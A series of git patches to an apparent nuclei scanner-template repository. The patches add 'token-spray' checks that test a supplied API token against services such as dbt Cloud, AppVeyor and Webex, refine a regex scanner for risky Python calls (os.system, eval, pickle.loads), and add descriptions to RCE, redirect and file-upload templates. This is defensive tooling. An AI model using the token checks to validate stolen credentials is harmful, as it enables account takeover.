3148/4083] Add dbt Cloud API test --- token-spray/dbt.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 token-spray/dbt.yaml diff --git a/token-spray/dbt.yaml b/token-spray/dbt.yaml new file mode 100644 index 0000000000..3c3dd15317 --- /dev/null +++ b/token-spray/dbt.yaml @@ -0,0 +1,24 @@ +id: api-dbt + +info: + name: dbt Cloud API Test + author: dwisiswant0 + reference: https://docs.getdbt.com/docs/introduction + severity: info + tags: token-spray,dbt + +self-contained: true +requests: + - method: GET + path: + - "https://cloud.getdbt.com/api/v2/accounts/" + headers: + Content-Type: application/json + Authorization: Token {{token}} + + matchers: + - type: word + part: body + words: + - "Invalid token" + negative: true From 3f9ab497f71bcd80475f0d4448a9d9593408d9ba Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Mon, 25 Oct 2021 07:25:39 +0700 Subject: [PATCH 3149/4083] Add AppVeyor API test --- token-spray/appveyor.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 token-spray/appveyor.yaml diff --git a/token-spray/appveyor.yaml b/token-spray/appveyor.yaml new file mode 100644 index 0000000000..c2b27b6d35 --- /dev/null +++ b/token-spray/appveyor.yaml @@ -0,0 +1,24 @@ +id: api-appveyor + +info: + name: AppVeyor API Test + author: dwisiswant0 + reference: https://www.appveyor.com/docs/api/ + severity: info + tags: token-spray,appveyor + +self-contained: true +requests: + - method: GET + path: + - "https://ci.appveyor.com/api/roles" + headers: + Content-Type: application/json + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - "Authorization required" + negative: true From 59f12021b0a119da27c8d2bd443142e6e33c4a63 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Mon, 25 Oct 2021 07:29:54 +0700 Subject: [PATCH 3150/4083] Add Adafruit IO API test --- token-spray/adafruit-io.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 token-spray/adafruit-io.yaml diff --git a/token-spray/adafruit-io.yaml b/token-spray/adafruit-io.yaml new file mode 100644 index 0000000000..b2253a1eac --- /dev/null +++ b/token-spray/adafruit-io.yaml @@ -0,0 +1,23 @@ +id: api-adafruit-io + +info: + name: Adafruit IO API Test + author: dwisiswant0 + reference: https://io.adafruit.com/api/docs/ + severity: info + tags: token-spray,adafruit + +self-contained: true +requests: + - method: GET + path: + - "https://io.adafruit.com/api/v2/user" + headers: + X-AIO-Key: "{{token}}" + + matchers: + - type: word + part: body + words: + - "error" + negative: true From 659eb0ee7b8803071bbf7faf589c4b5dfa792150 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Mon, 25 Oct 2021 07:51:04 +0700 Subject: [PATCH 3151/4083] Add LeanIX API test --- token-spray/leanix.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 token-spray/leanix.yaml diff --git a/token-spray/leanix.yaml b/token-spray/leanix.yaml new file mode 100644 index 0000000000..8ad2e155eb --- /dev/null +++ b/token-spray/leanix.yaml @@ -0,0 +1,25 @@ +id: api-leanix + +info: + name: LeanIX API Test + author: dwisiswant0 + reference: https://docs.leanix.net/docs/rest-api + severity: info + tags: token-spray,leanix + +self-contained: true +requests: + - method: GET + path: + - "https://us.leanix.net/services/integration-api/v1/examples/starterExample" + - "https://eu.leanix.net/services/integration-api/v1/examples/starterExample" + headers: + Authorization: Bearer {{token}} + + stop-at-first-match: true + matchers: + - type: word + part: body + words: + - "Credentials are required" + negative: true From 57f079835563c329c5a99a50ebe1960cb4a21271 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Mon, 25 Oct 2021 07:55:49 +0700 Subject: [PATCH 3152/4083] Add Cisco Webex API test --- token-spray/webex.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 token-spray/webex.yaml diff --git a/token-spray/webex.yaml b/token-spray/webex.yaml new file mode 100644 index 0000000000..d876d5a459 --- /dev/null +++ b/token-spray/webex.yaml @@ -0,0 +1,23 @@ +id: api-webex + +info: + name: Cisco Webex API Test + author: dwisiswant0 + reference: https://developer.webex.com/docs/getting-started + severity: info + tags: token-spray,cisco + +self-contained: true +requests: + - method: GET + path: + - "https://webexapis.com/v1/rooms" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - "errors" + negative: true From 2a4d0446cb3e15c992f1ac72ef56ea35d263f34c Mon Sep 17 00:00:00 2001 From: Majid Iranpour <33040588+majidmc2@users.noreply.github.com> Date: Mon, 25 Oct 2021 06:44:24 +0000 Subject: [PATCH 3153/4083] Update python-scanner.yaml --- file/python/python-scanner.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/file/python/python-scanner.yaml b/file/python/python-scanner.yaml index 7fc05334ae..fb7b6a7902 100644 --- a/file/python/python-scanner.yaml +++ b/file/python/python-scanner.yaml @@ -15,7 +15,7 @@ file: extractors: - type: regex - name: Possibility of SQLi vulnerability Code Injection + name: Possibility of Code Injection vulnerability regex: - 'exec' - 'eval' @@ -23,7 +23,7 @@ file: - type: regex - name: The Command Injection Series + name: The Command Injection series regex: - 'subprocess.call\(.*shell=True.*\)' - 'os.system' @@ -46,4 +46,4 @@ file: - type: regex name: Possibility of SQLi vulnerability regex: - - 'cursor.execute' \ No newline at end of file + - 'cursor.execute' From ee82e5c5915dbbd7ec46c284e1b79d8dde9ce210 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 09:56:44 +0300 Subject: [PATCH 3154/4083] Add description --- vulnerabilities/other/ruijie-eg-rce.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/ruijie-eg-rce.yaml b/vulnerabilities/other/ruijie-eg-rce.yaml index c3c1bccd2b..53a0745348 100644 --- a/vulnerabilities/other/ruijie-eg-rce.yaml +++ b/vulnerabilities/other/ruijie-eg-rce.yaml @@ -4,6 +4,7 @@ info: name: Ruijie EG cli.php RCE author: pikpikcu severity: critical + description: A vulnerability in Ruikie EG's cli.php end point allows remote unauthenticated attackers to gain 'admin' privileges. The vulnerability is exploitable because an unauthenticated user can gain 'admin' privileges due to a vulnerability in the login screen. reference: - http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20cli.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html - https://www.ruijienetworks.com From 5636579be13f647c7f207871018dcbf0e44186d5 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 09:57:47 +0300 Subject: [PATCH 3155/4083] Non-broken link --- vulnerabilities/other/ruijie-eg-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/ruijie-eg-rce.yaml b/vulnerabilities/other/ruijie-eg-rce.yaml index 53a0745348..fc7ebb44a7 100644 --- a/vulnerabilities/other/ruijie-eg-rce.yaml +++ b/vulnerabilities/other/ruijie-eg-rce.yaml @@ -6,7 +6,7 @@ info: severity: critical description: A vulnerability in Ruikie EG's cli.php end point allows remote unauthenticated attackers to gain 'admin' privileges. The vulnerability is exploitable because an unauthenticated user can gain 'admin' privileges due to a vulnerability in the login screen. reference: - - http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20cli.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html + - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20cli.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md - https://www.ruijienetworks.com tags: ruijie,rce From d03fce098eecf53851ac5f1bec2eb0cd52de981d Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 09:58:59 +0300 Subject: [PATCH 3156/4083] Add description --- vulnerabilities/other/sap-redirect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/sap-redirect.yaml b/vulnerabilities/other/sap-redirect.yaml index b682931eb4..e970788ccf 100644 --- a/vulnerabilities/other/sap-redirect.yaml +++ b/vulnerabilities/other/sap-redirect.yaml @@ -4,6 +4,7 @@ info: name: SAP wide open redirect author: Gal Nagli severity: medium + description: A vulnerability in SAP's 'logoff' endpoint allows attackers to redirect victims to their URL of choice. tags: redirect,sap From 130e5b1ff5f40c1d9d57ad4d474e7276b9592f93 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 10:01:03 +0300 Subject: [PATCH 3157/4083] add description --- vulnerabilities/other/unauth-hoteldruid-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/unauth-hoteldruid-panel.yaml b/vulnerabilities/other/unauth-hoteldruid-panel.yaml index bdf29a8c0c..921549ed63 100644 --- a/vulnerabilities/other/unauth-hoteldruid-panel.yaml +++ b/vulnerabilities/other/unauth-hoteldruid-panel.yaml @@ -3,6 +3,7 @@ info: name: Unauthenticated Hoteldruid Panel author: princechaddha severity: high + description: A vulnerability in Hoteldruid Panel allows remote unauthenticated users access to the management portal without authentication. reference: https://www.hoteldruid.com/ tags: hoteldruid,panel,unauth From a3d1ca6b81992bf5f999dd4b2530e0e1791809d8 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 10:06:44 +0300 Subject: [PATCH 3158/4083] Description --- vulnerabilities/other/zhiyuan-file-upload.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/zhiyuan-file-upload.yaml b/vulnerabilities/other/zhiyuan-file-upload.yaml index 507967995b..ef4d17e337 100644 --- a/vulnerabilities/other/zhiyuan-file-upload.yaml +++ b/vulnerabilities/other/zhiyuan-file-upload.yaml @@ -4,6 +4,7 @@ info: name: Zhiyuan Oa arbitrary file upload vulnerability author: gy741 severity: critical + description: A vulnerability in Zhiyuan Oa allows remote unauthenticated attackers to upload arbitrary files to the remote server which they can later access and cause their code to be executed. reference: https://www.programmersought.com/article/92658169875/ tags: zhiyuan,rce From 66a811c3c2d80c1eb4c2cf25e050d0975506aee8 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 10:06:50 +0300 Subject: [PATCH 3159/4083] Better description --- .../wordpress/wp-woocommerce-pdf-invoice-listing.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml b/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml index 1e407392e7..efdb6f29c9 100644 --- a/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml +++ b/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml @@ -4,7 +4,7 @@ info: name: Woocommerce PDF Invoice Exposure author: mohammedsaneem,sec_hawk severity: medium - description: Allows attacker to view sensitive information such as company invoices + description: A vulnerability in Woocommerce allows remote unauthenticated attackers to access company invoices and other sensitive information. reference: - https://twitter.com/sec_hawk/status/1426984595094913025?s=21 - https://github.com/Mohammedsaneem/wordpress-upload-information-disclosure/blob/main/worpress-upload.yaml From e9bd13da3e1ed2041076e00c72ed146b544c1978 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 10:07:28 +0300 Subject: [PATCH 3160/4083] Product name is 'OA' --- vulnerabilities/other/zhiyuan-file-upload.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/other/zhiyuan-file-upload.yaml b/vulnerabilities/other/zhiyuan-file-upload.yaml index ef4d17e337..f596b39871 100644 --- a/vulnerabilities/other/zhiyuan-file-upload.yaml +++ b/vulnerabilities/other/zhiyuan-file-upload.yaml @@ -1,10 +1,10 @@ id: zhiyuan-file-upload info: - name: Zhiyuan Oa arbitrary file upload vulnerability + name: Zhiyuan OA arbitrary file upload vulnerability author: gy741 severity: critical - description: A vulnerability in Zhiyuan Oa allows remote unauthenticated attackers to upload arbitrary files to the remote server which they can later access and cause their code to be executed. + description: A vulnerability in Zhiyuan OA allows remote unauthenticated attackers to upload arbitrary files to the remote server which they can later access and cause their code to be executed. reference: https://www.programmersought.com/article/92658169875/ tags: zhiyuan,rce From 2bffa2663526c2d1107701f073f144936be29c17 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 10:09:13 +0300 Subject: [PATCH 3161/4083] Advisory description --- vulnerabilities/wordpress/wptouch-open-redirect.yaml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/vulnerabilities/wordpress/wptouch-open-redirect.yaml b/vulnerabilities/wordpress/wptouch-open-redirect.yaml index 8f06d478a4..d999043d40 100644 --- a/vulnerabilities/wordpress/wptouch-open-redirect.yaml +++ b/vulnerabilities/wordpress/wptouch-open-redirect.yaml @@ -4,6 +4,14 @@ info: name: WPTouch Switch Desktop 3.x Open Redirection author: 0x_Akoko severity: medium + description: | + WordPress WPTouch Switch Desktop 3.x accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks. + + An HTTPparameter may contain a URL value and could cause the web application to redirect the request to the specified URL. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts have a more trustworthy appearance. + + Open redirect is a failure in that process that makes it possible for attackers to steer users to malicious websites. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it. Web users often encounter redirection when they visit the Web site of a company whose name has been changed or which has been acquired by another company. Visiting unreal web page user's computer becomes affected by malware the task of which is to deceive the valid actor and steal his personal data. + + The WPtouch plugin for WordPress is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. A successful exploit may aid in phishing attacks; other attacks are possible. reference: https://cxsecurity.com/issue/WLB-2020030114 tags: wp-plugin,redirect,wordpress From d226205902e0647fb2e03551a905909265589d08 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 25 Oct 2021 12:51:18 +0530 Subject: [PATCH 3162/4083] Update and rename webex.yaml to api-webex.yaml --- token-spray/{webex.yaml => api-webex.yaml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename token-spray/{webex.yaml => api-webex.yaml} (92%) diff --git a/token-spray/webex.yaml b/token-spray/api-webex.yaml similarity index 92% rename from token-spray/webex.yaml rename to token-spray/api-webex.yaml index d876d5a459..e8f60ed51b 100644 --- a/token-spray/webex.yaml +++ b/token-spray/api-webex.yaml @@ -3,9 +3,9 @@ id: api-webex info: name: Cisco Webex API Test author: dwisiswant0 - reference: https://developer.webex.com/docs/getting-started severity: info - tags: token-spray,cisco + reference: https://developer.webex.com/docs/getting-started + tags: token-spray,cisco,webex self-contained: true requests: From 17d4b8f95f44b714ed185851811664acab127945 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 25 Oct 2021 12:52:21 +0530 Subject: [PATCH 3163/4083] Update and rename leanix.yaml to api-leanix.yaml --- token-spray/{leanix.yaml => api-leanix.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename token-spray/{leanix.yaml => api-leanix.yaml} (100%) diff --git a/token-spray/leanix.yaml b/token-spray/api-leanix.yaml similarity index 100% rename from token-spray/leanix.yaml rename to token-spray/api-leanix.yaml index 8ad2e155eb..53be0b6e95 100644 --- a/token-spray/leanix.yaml +++ b/token-spray/api-leanix.yaml @@ -3,8 +3,8 @@ id: api-leanix info: name: LeanIX API Test author: dwisiswant0 - reference: https://docs.leanix.net/docs/rest-api severity: info + reference: https://docs.leanix.net/docs/rest-api tags: token-spray,leanix self-contained: true From 012b4e9a2559d52530509639b9738b2024c195aa Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 25 Oct 2021 12:53:50 +0530 Subject: [PATCH 3164/4083] Update and rename adafruit-io.yaml to api-adafruit-io.yaml --- token-spray/{adafruit-io.yaml => api-adafruit-io.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename token-spray/{adafruit-io.yaml => api-adafruit-io.yaml} (100%) diff --git a/token-spray/adafruit-io.yaml b/token-spray/api-adafruit-io.yaml similarity index 100% rename from token-spray/adafruit-io.yaml rename to token-spray/api-adafruit-io.yaml index b2253a1eac..c9eb638d7d 100644 --- a/token-spray/adafruit-io.yaml +++ b/token-spray/api-adafruit-io.yaml @@ -3,8 +3,8 @@ id: api-adafruit-io info: name: Adafruit IO API Test author: dwisiswant0 - reference: https://io.adafruit.com/api/docs/ severity: info + reference: https://io.adafruit.com/api/docs/ tags: token-spray,adafruit self-contained: true From 426e37b3f19cfbde7adbf5336bed6e9c078b10ab Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 25 Oct 2021 12:54:35 +0530 Subject: [PATCH 3165/4083] Update and rename appveyor.yaml to api-appveyor.yaml --- token-spray/{appveyor.yaml => api-appveyor.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename token-spray/{appveyor.yaml => api-appveyor.yaml} (100%) diff --git a/token-spray/appveyor.yaml b/token-spray/api-appveyor.yaml similarity index 100% rename from token-spray/appveyor.yaml rename to token-spray/api-appveyor.yaml index c2b27b6d35..e1b8ee023e 100644 --- a/token-spray/appveyor.yaml +++ b/token-spray/api-appveyor.yaml @@ -3,8 +3,8 @@ id: api-appveyor info: name: AppVeyor API Test author: dwisiswant0 - reference: https://www.appveyor.com/docs/api/ severity: info + reference: https://www.appveyor.com/docs/api/ tags: token-spray,appveyor self-contained: true From e5e4dee853c6ae72ebc4b1f238bcc5c66c08231a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 25 Oct 2021 12:56:04 +0530 Subject: [PATCH 3166/4083] Update and rename dbt.yaml to api-dbt.yaml --- token-spray/{dbt.yaml => api-dbt.yaml} | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) rename token-spray/{dbt.yaml => api-dbt.yaml} (85%) diff --git a/token-spray/dbt.yaml b/token-spray/api-dbt.yaml similarity index 85% rename from token-spray/dbt.yaml rename to token-spray/api-dbt.yaml index 3c3dd15317..8d19b5b055 100644 --- a/token-spray/dbt.yaml +++ b/token-spray/api-dbt.yaml @@ -3,8 +3,8 @@ id: api-dbt info: name: dbt Cloud API Test author: dwisiswant0 - reference: https://docs.getdbt.com/docs/introduction severity: info + reference: https://docs.getdbt.com/docs/introduction tags: token-spray,dbt self-contained: true @@ -21,4 +21,6 @@ requests: part: body words: - "Invalid token" + - "Authentication credentials were not provided." + condition: or negative: true From 1cc0b56f813927a9048dcdc430a1514fedbf44c4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 25 Oct 2021 12:57:30 +0530 Subject: [PATCH 3167/4083] Rename taiga.yaml to api-taiga.yaml --- token-spray/{taiga.yaml => api-taiga.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename token-spray/{taiga.yaml => api-taiga.yaml} (100%) diff --git a/token-spray/taiga.yaml b/token-spray/api-taiga.yaml similarity index 100% rename from token-spray/taiga.yaml rename to token-spray/api-taiga.yaml From 23890128b3306664d764072cfaf8fa7e064fabb7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 25 Oct 2021 12:58:18 +0530 Subject: [PATCH 3168/4083] Update and rename strava.yaml to api-strava.yaml --- token-spray/{strava.yaml => api-strava.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename token-spray/{strava.yaml => api-strava.yaml} (92%) diff --git a/token-spray/strava.yaml b/token-spray/api-strava.yaml similarity index 92% rename from token-spray/strava.yaml rename to token-spray/api-strava.yaml index cbe7b3cf90..b7ec7eb8b9 100644 --- a/token-spray/strava.yaml +++ b/token-spray/api-strava.yaml @@ -19,5 +19,5 @@ requests: - type: word part: body words: - - "errors" + - "Authorization Error" negative: true From 412922c40a7cbfa64eabd6723cf7ffe4f7f4e61e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 25 Oct 2021 13:01:20 +0530 Subject: [PATCH 3169/4083] Update forcepoint-applicance.yaml --- exposed-panels/forcepoint-applicance.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/exposed-panels/forcepoint-applicance.yaml b/exposed-panels/forcepoint-applicance.yaml index 7aa165dfbb..02c1ef2696 100644 --- a/exposed-panels/forcepoint-applicance.yaml +++ b/exposed-panels/forcepoint-applicance.yaml @@ -4,9 +4,9 @@ info: name: Forcepoint Appliance author: dhiyaneshDK severity: info - tags: panel metadata: shodan-query: 'http.title:"Forcepoint Appliance"' + tags: panel,forcepoint requests: - method: GET @@ -18,6 +18,7 @@ requests: - type: word words: - 'Forcepoint Appliance' + - type: status status: - 200 From 8fba3e554b09a67ea09fbaf4cad7af9c7463b517 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 25 Oct 2021 13:02:03 +0530 Subject: [PATCH 3170/4083] Update pure-storage-login.yaml --- exposed-panels/pure-storage-login.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/exposed-panels/pure-storage-login.yaml b/exposed-panels/pure-storage-login.yaml index 7b17cd25c5..c3023035b8 100644 --- a/exposed-panels/pure-storage-login.yaml +++ b/exposed-panels/pure-storage-login.yaml @@ -4,9 +4,9 @@ info: name: Pure Storage Login author: dhiyaneshDK severity: info - tags: panel metadata: shodan-query: 'http.title:"Pure Storage Login"' + tags: panel requests: - method: GET @@ -18,6 +18,7 @@ requests: - type: word words: - 'Pure Storage Login' + - type: status status: - 200 From 406fa5b826b38da14dfff8c5c5a758143eb792e9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 25 Oct 2021 13:54:55 +0530 Subject: [PATCH 3171/4083] Update workresources-rdp.yaml --- exposed-panels/workresources-rdp.yaml | 10 +++------- 1 file changed, 3 insertions(+), 7 deletions(-) diff --git a/exposed-panels/workresources-rdp.yaml b/exposed-panels/workresources-rdp.yaml index 6097220ed9..71d8f9336e 100644 --- a/exposed-panels/workresources-rdp.yaml +++ b/exposed-panels/workresources-rdp.yaml @@ -4,9 +4,9 @@ info: name: Work Resources RemoteApp and Desktop Connection author: dhiyaneshDK severity: info - tags: panel metadata: shodan-query: 'http.title:"RD Web Access"' + tags: panel requests: - method: GET @@ -17,12 +17,8 @@ requests: matchers: - type: word words: - - 'RD Web Access' - - 'WorkSpaceID' - - 'PublicModeTimeout' - - 'RedirectorName' - - 'tdClaimsDomainUserNameLable' - - 'trPasswordExpiredNoChange' + - 'Error: Unable to display RD Web Access' + - type: status status: - 200 From e43354523ca7479b401dc16db23f384f7f6a7fc1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 25 Oct 2021 13:55:23 +0530 Subject: [PATCH 3172/4083] Update zeroshell-login.yaml --- exposed-panels/zeroshell-login.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/exposed-panels/zeroshell-login.yaml b/exposed-panels/zeroshell-login.yaml index cdaabf8b66..ebca531da8 100644 --- a/exposed-panels/zeroshell-login.yaml +++ b/exposed-panels/zeroshell-login.yaml @@ -4,9 +4,9 @@ info: name: ZeroShell Login author: dhiyaneshDK severity: info - tags: panel metadata: shodan-query: 'http.title:"ZeroShell"' + tags: panel,zeroshell requests: - method: GET @@ -18,6 +18,7 @@ requests: - type: word words: - 'ZeroShell' + - type: status status: - 200 From c37c71f8595af955079b8ad5ca46398563248774 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 25 Oct 2021 14:35:29 +0530 Subject: [PATCH 3173/4083] Update python-scanner.yaml --- file/python/python-scanner.yaml | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) diff --git a/file/python/python-scanner.yaml b/file/python/python-scanner.yaml index fb7b6a7902..7952ec59b4 100644 --- a/file/python/python-scanner.yaml +++ b/file/python/python-scanner.yaml @@ -4,8 +4,10 @@ info: name: Python Scanner author: majidmc2 severity: info - description: Scan for dangerous Python functions. - reference: https://www.kevinlondon.com/2015/07/26/dangerous-python-functions.html, https://www.kevinlondon.com/2015/08/15/dangerous-python-functions-pt2.html + description: Scan for dangerous Python functions + reference: + - https://www.kevinlondon.com/2015/07/26/dangerous-python-functions.html + - https://www.kevinlondon.com/2015/08/15/dangerous-python-functions-pt2.html tags: python,file @@ -15,7 +17,7 @@ file: extractors: - type: regex - name: Possibility of Code Injection vulnerability + name: Possible Code Injection regex: - 'exec' - 'eval' @@ -23,7 +25,7 @@ file: - type: regex - name: The Command Injection series + name: Possible Command Injection regex: - 'subprocess.call\(.*shell=True.*\)' - 'os.system' @@ -31,19 +33,18 @@ file: - type: regex - name: The pickle module is not secure + name: Possibly Unpickling untrusted source regex: - 'pickle.loads' - 'cPickle.loads' - type: regex - name: Loading dangerous YAMLs + name: Possibly loading dangerous YAMLs regex: - 'yaml.load' - - type: regex - name: Possibility of SQLi vulnerability + name: Possible SQLi regex: - 'cursor.execute' From a6ab5dd77108d1c8e3eb3cb4f2fc9d7f0969be21 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 25 Oct 2021 14:35:43 +0530 Subject: [PATCH 3174/4083] Update python-scanner.yaml --- file/python/python-scanner.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/file/python/python-scanner.yaml b/file/python/python-scanner.yaml index 7952ec59b4..6f7b8770d6 100644 --- a/file/python/python-scanner.yaml +++ b/file/python/python-scanner.yaml @@ -8,7 +8,7 @@ info: reference: - https://www.kevinlondon.com/2015/07/26/dangerous-python-functions.html - https://www.kevinlondon.com/2015/08/15/dangerous-python-functions-pt2.html - tags: python,file + tags: python,file,sast file: From a96bfc3992fe58b899aa8a7ade68b30931b1ef1c Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 12:52:58 +0300 Subject: [PATCH 3175/4083] Add description --- vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml | 1 + vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml b/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml index 64d1b30634..c7641f841a 100644 --- a/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml +++ b/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml @@ -4,6 +4,7 @@ info: name: WordPress Weekender Newspaper Themes 9.0 - Open Redirection author: 0x_Akoko severity: low + description: The WordPress Weekender Newspaper Themes allows remote attackers to redirect users to an attacker controlled URL. reference: https://cxsecurity.com/issue/WLB-2020040103 tags: wordpress,wp-plugin,redirect diff --git a/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml b/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml index 683cf92dc3..226a87797b 100644 --- a/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml +++ b/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml @@ -3,6 +3,7 @@ info: name: WordPress accessible wp-config author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n severity: high + description: The remote WordPress installation has the `wp-config` file remotely accessible and its content available for reading. tags: wordpress,backup requests: From 6a6ba60aade8f70f1cb9a3e205cff190d340b6e2 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 12:53:22 +0300 Subject: [PATCH 3176/4083] Description --- vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml b/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml index d649437101..4b8b194cfc 100644 --- a/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml +++ b/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml @@ -4,6 +4,7 @@ info: name: WordPress Attitude Themes 1.1.1 Open Redirection author: 0x_Akoko severity: low + description: The WordPress Attitude Themes allows remote attackers to redirect users to an attacker controlled URL. reference: https://cxsecurity.com/issue/WLB-2020030183 tags: wordpress,wp-theme,redirect From c9e9c04f37856d253f422325be2d7e8bd6dd8902 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 12:54:00 +0300 Subject: [PATCH 3177/4083] Add description --- vulnerabilities/wordpress/easy-wp-smtp-listing.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/wordpress/easy-wp-smtp-listing.yaml b/vulnerabilities/wordpress/easy-wp-smtp-listing.yaml index 1c669ac324..6225458a19 100644 --- a/vulnerabilities/wordpress/easy-wp-smtp-listing.yaml +++ b/vulnerabilities/wordpress/easy-wp-smtp-listing.yaml @@ -4,6 +4,7 @@ info: name: SMTP WP Plugin Directory listing enabled author: PR3R00T severity: high + description: The WordPress Easy WP SMTP Plugin has its 'easy-wp-smtp' folder remotely acccessible and its content available for access. reference: 